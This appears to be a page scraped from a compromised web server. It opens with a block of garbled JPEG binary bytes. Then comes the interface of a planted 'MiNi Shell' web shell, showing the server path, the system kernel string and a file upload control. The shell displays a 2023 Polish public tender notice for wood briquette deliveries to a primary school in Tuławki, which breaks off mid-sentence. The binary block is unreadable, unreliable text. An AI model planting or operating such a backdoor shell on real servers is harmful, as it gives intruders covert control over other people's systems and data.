JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20231025/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20231025/0046127601-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Sukcesywna dostawa paliwa w postaci stałej (Brykietu drzewnego) do szkoły podstawowej w Tuławkach. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">SZKOŁA PODSTAWOWA W TUŁAWKACH</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Szkoła Podstawowa w Tuławkach</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 001125732</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">31</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Tuławki</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">11-001</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">warmińsko-mazurskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL622 - Olsztyński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">895130226</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zstulawki@tlen.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://spf13.biposwiata.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Sukcesywna dostawa paliwa w postaci stałej (Brykietu drzewnego) do szkoły podstawowej w Tuławkach. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-e8b25916-7187-11ee-9aa3-96d3b4440790</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00461276</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-10-25</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00459860/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 Sukcesywna dostawa brykietu drzewnego</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-e8b25916-7187-11ee-9aa3-96d3b4440790 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja w postępowaniu o udzielenie zamówienia, w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między Zamawiającym a Wykonawcami, odbywa się przy użyciu środków komunikacji elektronicznej platformy e-Zamówienia (https://ezamowienia.gov.pl/), mailowo, za pośrednictwem platformy ePUAP: SP_Tulawki.<br/><br/>Zamawiający wskazuje adres poczty elektronicznej do kontaktu: zstulawki@tlen.pl.<br/>Osoby uprawnione do komunikowania się z Wykonawcami:<br/>Karolina Moczulska – e-mail: zstulawki@tlen.pl,<br/>Mariola Soroka-Christow - e-mail: zstulawki@tlen.pl.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Sposób sporządzenia dokumentów elektronicznych, cyfrowych odwzorowań dokumentów i innych informacji musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie oraz rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 <br/>z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (RODO) informujemy, że:<br/> 1. Administratorem Pani/Pana danych osobowych jest Dyrektor Szkoły Podstawowej w Tuławkach- Mariola Soroka Christow adres: Tuławki 31 11-001 Dywity, tel.: 89 513 02 26<br/> 2. Administrator wyznaczył Inspektora Ochrony Danych, z którym mogą się Państwo kontaktować we wszystkich sprawach dotyczących przetwarzania danych osobowych za pośrednictwem adresu email: inspektor@cbi24.pl lub pisemnie na adres Administratora.<br/> 3. Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z realizacją niniejszej umowy. <br/> 4. Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 8 oraz art. 96 ust. 3 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych (t.j. Dz. U. 2018 r. poz. 1986), dalej „ustawa Pzp”.<br/> 5. Pani/ Pana dane osobowe będą przechowywane przez okres 5 lat od dnia zakończenia postępowania o udzielenie zamówienia, zgodnie z obowiązującym JRWA Szkoły Podstawowej w Tuławkach.<br/> 6. Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp.<br/> 7. W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22 RODO.<br/> 8. Posiada Pan/Pani:<br/> a) prawo dostępu do danych osobowych Pani/Pana dotyczących na podstawie art. 15 RODO,<br/> b) prawo do sprostowania Pani/Pana danych osobowych* na podstawie art. 16 RODO,<br/> c) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO**,<br/> d) prawo do wniesienia skargi do organu nadzorczego tj. Prezesa Urzędu Ochrony Danych Osobowych.<br/> 9. Nie przysługuje Pani/Panu:<br/> a) prawo do usunięcia danych osobowych w związku z art. 17 ust. 3 lit. b, d lub e RODO,<br/> b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO,<br/> c) prawo sprzeciwu wobec przetwarzania danych osobowych, o którym mowa w art. 21 RODO, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">SPT.271.1.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 168000 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest dostawa w 2024 roku paliwa w postaci stałej – brykietu drzewnego w ilości do 120 ton, . <br/>Dostawa paliwa odbywać się będzie w terminie styczeń 2024 - grudzień 2024 r.<br/>Wymaga się, aby dostarczane paliwo (brykiet drzewny) posiadało co najmniej poniższe parametry: <br/>1) Wilgotność - poniżej 14,00 %,<br/>2) Kształt – walec,<br/>3) Zawartość popiołu - do 1,5 %,<br/>4) Wartość opałowa – nie mniejsza niż 14 GJ/t,<br/>5) Workowany -pakowany w worki po 25 kg.<br/>Zamawiający dopuszcza brykiet drzewny z drewna mieszanego.<br/>Brykiet powinien być wyprodukowany z drewna, z rozdrobnionych odpadów drzewnych takich jak trociny, wióry czy zrębki, w postaci walca o regularnej bryle i długości. Brykiet nie może zawierać żadnych związków chemicznych, domieszek kleju, trocin z płyt, plastiku, gumy, papieru, ciał obcych itp. <br/>Brykiet nie może być wytwarzany z drewna zanieczyszczonego impregnatami i powłokami ochronnymi, które mogą zawierać związki chlorowcoorganiczne lub metale ciężkie, oraz z drewna pochodzącego odpadów budowlanych lub rozbiórki. <br/>Zamawiający zastrzega sobie możliwość zmniejszenia lub zwiększenia ilości zamawianego opału (brykietu) bez ponoszenia dodatkowych opłat oraz bez jakichkolwiek roszczeń ze strony Wykonawcy. <br/>Dostawa opału (brykietu) każdorazowo obejmuje: zakup, a w przypadku gdy Wykonawca jest producentem brykietu sprzedaż; załadunek; transport; rozładunek przy użyciu sprzętu Wykonawcy i na jego koszt.<br/>Do każdej dostawy Wykonawca dołączy dokument potwierdzający ilość (wagę) dostarczonego opału zgodną ze stanem faktycznym.<br/>Na każde żądanie Zamawiającego, Wykonawca przedstawi dokumenty potwierdzające wymagane parametry jakościowe i opałowe dostarczanego brykietu drzewnego (np. protokoły z badań, analizy brykietów, certyfikaty potwierdzające jakość dostarczonego paliwa opałowego).<br/>O ilościach paliwa opałowego (brykietu) i terminach poszczególnych dostaw Zamawiający będzie informował Wykonawcę z wyprzedzeniem telefonicznie lub drogą elektroniczną. <br/>Dostawa brykietu do wiaty składu opału przy Szkole Podstawowej w Tuławkach będzie następować partiami w terminach wyznaczanych przez Zamawiającego po zawarciu umowy, zgodnie z ofertą złożoną przez Wykonawcę. <br/>Każda dostawa będzie się odbywała w terminach i w ilościach wskazanych przez Zamawiającego w dni robocze Zamawiającego od poniedziałku do piątku, w godzinach przez niego wskazanych. Jednorazowa wielkość dostawy nie może przekraczać 20 ton. <br/>Zamawiający ma prawo odmówić przyjęcia danej partii dostawy, bez żadnych konsekwencji finansowych, jeżeli potwierdzi, że dostarczony opał nie spełnia warunków zamówienia w zakresie zamówionej ilości lub jakości. <br/>Zamawiający informuje, że wszelkie koszty transportu związane z realizacją przedmiotowego zamówienia oraz zawartej na tą okoliczność umowy, będzie ponosił Wykonawca <br/>Do realizacji przedmiotowego zamówienia Wykonawca zobowiązany jest: <br/>1) dostarczyć przedmiot zamówienia zgodnie z wymaganiami Zamawiającego;<br/>2) dostarczyć Zamawiającemu produkt nowy, nieuszkodzony, o wymaganych parametrach.<br/>Zamawiający dopuszcza zastosowanie rozwiązań równoważnych poprzez wskazanie przez Wykonawcę np. nazw własnych, znaków towarowych, patentów, pochodzenia lub norm, o ile zaproponowane rozwiązania będą miały te same cechy funkcjonalne i których jakość nie będzie gorsza od wymaganej przez Zamawiającego. Możliwość zastosowania rozwiązań równoważnych będzie uzależniona od ich zgodności z parametrami określonymi w SWZ oraz akceptacji Zamawiającego. Wykonawca, który powołuje się na rozwiązania równoważne jest obowiązany wykazać, że oferowane przez niego dostawy spełniają wymagania określone w SWZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">09111220-8 - Brykiety</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-01-01 do 2024-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Cenę oferty stanowić będzie łączna kwota wynagrodzenia brutto (cena oferty brutto), wraz z podatkiem VAT, za wykonanie całości przedmiotu zamówienia.<br/> 1. Opis sposobu obliczenia ceny oferty zawiera tabelka przedstawiona we wzorze formularza oferty, stanowiącym załącznik numer 1 do SWZ.<br/> 2. Cena oferty musi być wyrażona w złotych polskich (PLN) liczbowo.<br/> 3. Cena oferty brutto stanowi wynagrodzenie ryczałtowe.<br/> 4. W cenie oferty należy uwzględnić wszelkie koszty, które poniesie Wykonawca w związku z prawidłową i pełną realizacją zamówienia, zgodnie z zakresem zamówienia określonym w SWZ i projektowanych postanowieniach umowy, a także podatek wynikający z powstania u Wykonawcy obowiązku podatkowego zgodnie z przepisami o podatku od towarów i usług (VAT) oraz ewentualne rabaty i upusty zastosowane przez Wykonawcę.<br/> 5. Wykonawca zobowiązany jest w ofercie podać stawkę podatku od towarów i usług (VAT), wyrażoną w procentach.<br/> 6. Do wyliczenia cen brutto za wykonanie przedmiotu zamówienia, Wykonawca zastosuje właściwą stawkę podatku od towarów i usług (VAT) w wysokości procentowej obowiązującej w dniu złożenia oferty. Wykonawca ponosi odpowiedzialność za właściwe określenie stawki podatku od towarów i usług (VAT) zgodnie z obowiązującymi przepisami prawa.<br/> 7. Wszystkie składniki cenowe określone w ofercie muszą być podane i liczone z dokładnością do dwóch miejsc po przecinku, przy zachowaniu matematycznej zasady zaokrąglania liczb.<br/>Zasady zaokrąglania do pełnego grosza (do dwóch miejsc po przecinku):<br/>Zaokrągleń należy dokonywać w następujący sposób: końcówki poniżej 0,5 grosza pomija się, a końcówki 0,5 grosza i wyższe zaokrągla się do 1 grosza (tj. jeżeli trzecia cyfra po przecinku jest mniejsza lub równa „4”, to należy zaokrąglić w dół, zaś jeżeli trzecia cyfra po przecinku jest równa lub większa od „5” należy zaokrąglić w górę).<br/> 8. Jeżeli Wykonawca złoży ofertę, której wybór prowadziłby do powstania u Zamawiającego obowiązku podatkowego zgodnie z ustawą z dnia 11 marca 2004 r. o podatku od towarów i usług (Dz. U. z 2022 r. poz. 931 z późn. zm.), dla celów zastosowania kryterium ceny Zamawiający doliczy do przedstawionej w tej ofercie ceny kwotę podatku od towarów i usług, którą miałby obowiązek rozliczyć.<br/> 9. W ofercie, o której mowa w ust. 9, Wykonawca ma obowiązek:<br/> 1) poinformowania Zamawiającego, że wybór jego oferty będzie prowadził do powstania u Zamawiającego obowiązku podatkowego;<br/> 2) wskazania nazwy (rodzaju) towaru lub usługi, których dostawa lub świadczenie będą prowadziły do powstania obowiązku podatkowego;<br/> 3) wskazania wartości towaru lub usługi objętego obowiązkiem podatkowym Zamawiającego, bez kwoty podatku;<br/> 4) wskazania stawki podatku od towarów i usług, która zgodnie z wiedzą Wykonawcy, będzie miała zastosowanie.<br/>Wzór formularza oferty został opracowany przez Zamawiającego przy założeniu, iż wybór oferty nie będzie prowadzić do powstania u Zamawiającego obowiązku podatkowego w zakresie podatku od towarów i usług (VAT). W przypadku, gdy Wykonawca zobowiązany jest złożyć oświadczenie o powstaniu u Zamawiającego obowiązku podatkowego, to powinien odpowiednio zmodyfikować treść formularza.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas realizacji dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> zdolności technicznej lub zawodowej:<br/>Wykonawca spełni warunek, jeżeli wykaże, że w okresie ostatnich trzech lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał, a w przypadku świadczeń powtarzających się lub ciągłych wykonuje: co najmniej 1 (jedną) dostawę odpowiadającą przedmiotowi zamówienia o wartości co najmniej 60.000,00 zł brutto zrealizowanej dostawy i udokumentuje należyte jej wykonanie.<br/>Za dostawę odpowiadającą przedmiotowi zamówienia Zamawiający uzna dostawę (jednorazową lub sukcesywną – w ramach jednego kontraktu / umowy) paliwa w postaci stałej/brykietu drzewnego o wartości co najmniej 60.000,00 zł brutto (słownie brutto: sześćdziesiąt tysięcy złotych 00/100) zrealizowanej dostawy.<br/>Przez „paliwa w postaci stałej” na potrzeby oceny przedmiotowego warunku Zamawiający rozumie: węgiel kamienny, eko-groszek, drewno, brykiet z węgla lub pellet <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Do oferty Wykonawca musi dołączyć oświadczenie, o niepodleganiu wykluczeniu i spełnianiu <br/>warunków udziału w postępowaniu, o którym mowa w art. 125 ust. 1 ustawy; w zakresie wskazanym przez Zamawiającego. <br/><br/>Wykazu dostaw wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te dostawy zostały wykonane lub są wykonywane należycie.<br/>Dowodami, o których mowa powyżej, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - oświadczenie Wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy.<br/>Wzór wykazu dostaw wykonanych stanowi załącznik numer 4 do SWZ.<br/>Uwaga:<br/>W wykazie dostaw wykonanych należy wskazać wyłącznie te dostawy, które potwierdzają spełnianie warunku udziału w postępowaniu, o którym mowa w ust. 1 lit. c rozdziału XI SWZ.<br/>Jeżeli Wykonawca powołuje się na doświadczenie w realizacji dostaw wykonanych lub wykonywanych wspólnie z innymi Wykonawcami, w wykazie dostaw wykonanych wskazuje tylko te dostawy, w których wykonaniu Wykonawca bezpośrednio uczestniczył, a w przypadku świadczeń powtarzających się lub ciągłych, w których wykonywaniu bezpośrednio uczestniczył lub uczestniczy.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 1. Zamawiający żąda złożenia przez Wykonawcę wraz z ofertą następujących przedmiotowych środków dowodowych:<br/>Zamawiający wymaga złożenia wraz z ofertą na każdą ze składanych części aktualnego na dzień składania oferty certyfikatu lub atestu jakości opału, lub innego równoważnego dokumentu wystawionego przez kopalnię/dystrybutora/składnicę opału lub od innego podmiotu prawnego, osoby fizycznej zajmującej się sprzedażą i dostawą przedmiotowego zakresu zamówienia z wyszczególnieniem parametrów jakościowych.<br/>Wykonawca przedłożonymi przedmiotowymi środkami dowodowymi musi potwierdzić, że oferowany przez Wykonawcę przedmiot zamówienia (paliwo w postaci stałej tj. brykiet drzewny) spełnia minimalne wymagania, wymogi i parametry określone przez Zamawiającego, zawarte w ust. 2 rozdziału IV SWZ – szczegółowym opisie przedmiotu zamówienia – wskazane w minimalnych parametrach technicznych. <br/> 2. Forma składanych przedmiotowych środków dowodowych:<br/>Przedmiotowe środki dowodowe Wykonawca sporządza w postaci elektronicznej, w formacie danych określonych w przepisach wydanych na podstawie art. 18 ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne oraz przekazuje w postaci elektronicznej i opatruje kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym.<br/>W przypadku gdy przedmiotowe środki dowodowe zostały sporządzone jako dokument w postaci papierowej i opatrzone własnoręcznym 